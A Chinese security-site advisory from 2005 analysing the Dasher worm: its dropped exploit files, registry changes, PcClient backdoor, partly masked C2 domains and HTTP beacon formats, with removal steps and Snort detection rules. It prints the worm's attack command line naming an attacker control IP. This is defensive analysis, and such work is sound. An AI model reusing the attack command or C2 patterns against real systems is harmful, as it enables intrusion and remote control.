首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>病毒分析>文章内容
Net-Worm.Win32.Dasher(黛蛇)蠕虫公告
来源:www.xfocus.net 作者:killer 发布时间:2005-12-22  

Net-Worm.Win32.Dasher(黛蛇)蠕虫公告

Author: killer (killer<2>xfocus.org)
Date:2005-12-20


近日,一种以利用MS05-051漏洞的新型的蠕虫爆发,该蠕虫在几天内迅速出现多个变种,新变种除了利用MS05-051外,还利用MS04-045、MS05-039、MSSQL-Hello等漏洞传播,威胁到Windows 2000、Windows XP、Windows 2003等系统。

病毒文件主要分为两部分,一部分为病毒的扫描、溢出部分,一部分是攻击者进行远程控制。

一、扫描:

蠕虫体在运行后会释放出来如下文件:

%System%\wins\Result.txt 结果文件
%System%\wins\SqlExp.exe Exploit.Win32.MS04-045.k
%System%\wins\SqlExp1.exe Exploit.Win32.MS05-039.ac
%System%\wins\SqlExp2.exe Exploit.Win32.MS05-051.d
%System%\wins\SqlExp3.exe Exploit.Win32.MSSQL-Hello.a
%System%\wins\SqlScan.exe NetTool.Win32.TCPPortScanner
%System%\wins\Sqltob.exe Net-Worm.Win32.Dasher.b

同目录下还可能存在42.txt、445.txt、1025.txt、1433.txt等遗留文件。


其中.b变种的sqltob.exe蠕虫体主文件:

[文件信息]
Size: 0x2420 (9248)
MD5:53BAE5B6B6CD8794B05DF2B99B4128BA
PE Appended: at 0x2264 (8804), size 0x1BC (444)
Compiler:LCC Win32

sqltob.exe协调扫描和攻击,攻击采用格式如下:SqlExp.exe -r 222.240.219.143 -p 53 -o 0 -t ip
其中222.240.219.143为“黑客”的控制IP。

1、蠕虫修改注册表,增加如下键:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters

键名:SMBDeviceEnabled
键值:dword:00000000

2、修改如下键:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDTC
键名:Start
修改为:dword:00000004

二、控制:

此组合蠕虫采用如下后门文件控制目标系统:

%ProgramFiles%\nzspfrwy.log keylog文件
%ProgramFiles%\nzspfrwy.dll Backdoor.Win32.PcClient.ij
%ProgramFiles%\nzspfrwy.dl1 Backdoor.Win32.PcClient.hp
%ProgramFiles%\nzspfrwy.sys Backdoor.Win32.PcClient.ij

其中nzspfrwy.sys驱动HOOK系统SSDT来隐藏nzspfrwy*文件。第一次运行将nzspfrwy.dll插入到svchost进程,并启动一个隐藏的IE进程与远程主机通信。连接域名free???-???.cn/zyangel和DNS??.3322.org域名,前者域名可以下载sdbot相关文件,后者将接受控制者控制。(?为屏蔽的字母)

1、修改如下键:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters
键名:ServiceDll
修改为:%ProgramFiles%\nzspfrwy.dll

2、增加如下服务:
服务名称:nzspfrwy
显示名称:nzspfrwy
执行文件路径:C:\Program Files\nzspfrwy.sys

3、采用如下方式与控制者通讯:
PUT /upjpg.asp?501361070000F0FD010026*
GET /index.asp?500261070000F0FD010026*

三、清除办法:(以WIN2000 PRO版为例)

1、任务管理器结束:Sqltob.exe、SqlScan.exe进程。
2、删除%System%\wins下对应文件。
3、修改注册表键停止内核驱动:

从如下地址下载IceSword运行:http://www.xfocus.net/tools/200506/1051.html

定位到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nzspfrwy
修改Startdword值为4,重启动系统。

4、重启动后,会在任务管理器中看到没有被隐藏的IE进程,该进程无法用任务管理器结束,可以用ntsd -cq -p pid 结束。
删除%ProgramFiles%\对应的病毒文件。

5、删除残余服务表项:
SC delete nzspfrwy
用注册表编辑器删除此键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NZSPFRWY

6、恢复HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters表项:
键名:ServiceDll
病毒键值:%ProgramFiles%\nzspfrwy.dll
恢复为:%SystemRoot%\system32\rpcss.dll

7、升级系统补丁。

8、在防火墙中屏蔽如下端口:
42
445
1025
1433


四、Snort预警规则:

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 1433 (msg:"EXPLOIT MS-SQL Hello Overflow Attempt"; flow:to_server,established; content:"|12 01 00 34 00 00 00 00|"; offset:0; depth:8; dsize:>570; reference:url,www.microsoft.com/technet/security/bulletin/MS02-056.mspx; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"EXPLOIT UPnP Overflow Attempt"; flow:to_server,established; content:"|ff 53 4d 42 25|"; offset:4; depth:5; content:"|5c 00 50 00 49 00 50 00 45 00 5c 00 00 00|"; offset:72; depth:14; content:"|26 00|"; offset:65; depth:2; content:"|00|"; offset:90; depth:1; content:"|36 00|"; offset:110; depth:2; content:"|90 90 90 90 90 90 90 90 90 90 90 90|"; offset:200; dsize:>1300; reference:url,www.microsoft.com/technet/security/bulletin/MS05-039.mspx; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"EXPLOIT MSDTC Overflow Attempt"; flow:to_server,established; content:"|05 00 00 83 10 00 00 00 2c 05|"; offset:0; depth:10; content:"|e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da|"; offset:24; depth:16; content:"|cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00|"; offset:208; dsize:1024; reference:url,www.microsoft.com/technet/security/bulletin/MS05-051.mspx; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 42 (msg:"EXPLOIT WINS Overflow Attempt"; flow:to_server,established; byte_test:1,&,64,6; byte_test:1,&,32,6; byte_test:1,&,16,6; byte_test:1,&,8,6; pcre:!"/^.{8}(\x05\x37(\x1E[\x90-\xFF]|[\x1F-\x2F].|\x30[\x00-\x70])|\x00\x00\x00[\x00-\x65]|\x02\x68\x05\xC0)/s"; reference:bugtraq,11763; reference:cve,2004-1080; reference:url,www.immunitysec.com/downloads/instantanea.pdf; reference:url,www.microsoft.com/technet/security/bulletin/MS04-045.mspx; classtype:misc-attack; sid:3017; rev:6;)


Creditz: Stardust帮忙修改Snort规则,及xfocus的兄弟们和安天实验室Cert小组。



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·Linux后门系列--由浅入深sk13完
·Word溢出Shellcode分析
·Ie0dayCVE0806.c 变种网马样本分
·Web应用漏洞的大规模攻击案例分
·Ie0dayCVE0806网马样本分析
·Witty病毒通过ISS的防火墙产品和
·熊猫烧香病毒分析与解决方案
·浅谈反病毒技术的前世今生
·酷狗音乐首页隐蔽挂马详细分析+7
·卡巴斯基(AVP)内存驻留型病毒检
·avserve病毒初步分析
·104种木马手工清除方法
  相关文章
·浅谈反病毒技术的前世今生
·卡巴斯基(AVP)内存驻留型病毒检
·avserve病毒初步分析
·Witty病毒通过ISS的防火墙产品和
·104种木马手工清除方法
·熊猫烧香病毒分析与解决方案
·酷狗音乐首页隐蔽挂马详细分析+7
·Linux后门系列--由浅入深sk13完
·Word溢出Shellcode分析
·Ie0dayCVE0806网马样本分析
·Ie0dayCVE0806.c 变种网马样本分
·Web应用漏洞的大规模攻击案例分
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved